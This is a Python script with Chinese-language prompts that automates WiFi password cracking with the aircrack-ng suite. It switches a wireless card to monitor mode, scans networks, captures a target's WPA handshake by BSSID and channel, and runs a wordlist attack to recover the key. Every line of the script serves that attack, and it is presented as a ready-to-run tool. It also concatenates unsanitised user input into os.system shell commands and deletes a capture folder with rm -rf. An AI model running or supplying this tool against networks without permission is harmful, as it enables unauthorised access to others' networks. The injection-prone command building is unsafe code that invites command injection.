import os
if __name__ == "__main__":
    print("==================================")
    os.system("iwconfig")
    wlaname=input("(注意，网卡将被调整至监听模式，您将无法正常上网)\n请输入无线网卡名: ")
    ret=os.system("airmon-ng start "+wlaname)
    if(ret!=0):
        print("Airmon-ng Error\n也许你没有使用root权限启动本程序")
        exit()
    print("==================================")
    os.system("iwconfig")
    monname=input("请输入监听网卡名（一般以mon结尾）: ")
    print("将会显示WIFI列表，按CTRL+C结束")
    os.system("airodump-ng "+monname)
    #path=input("请抓包存储的路径: ")
    CH=input("请输入WIFI的信道频率（即CH）: ")
    BSSID=input("请输入WIFI的BSSID: ")
    print("注意，将清除caps文件夹下的所有包！")
    os.system("rm -rf caps/*")
    print("请等待抓包完成，当出现handshake请按CTRL+C")
    os.system("airodump-ng --bssid "+BSSID+" -c "+CH+" -w ./caps/wifi "+monname)
    print("抓包完成")
    os.system("ls wordlists/")
    wordlist=input("请输入要选择的密码字典名: ")
    print("即将开始字典破解")
    os.system("aircrack-ng -w wordlists/"+wordlist+" caps/wifi-01.cap")
    print("破解结束,密码在上方KEY FOUNG一栏中，网卡的监听模式将自动解除")
    os.system("airmon-ng stop "+monname)
    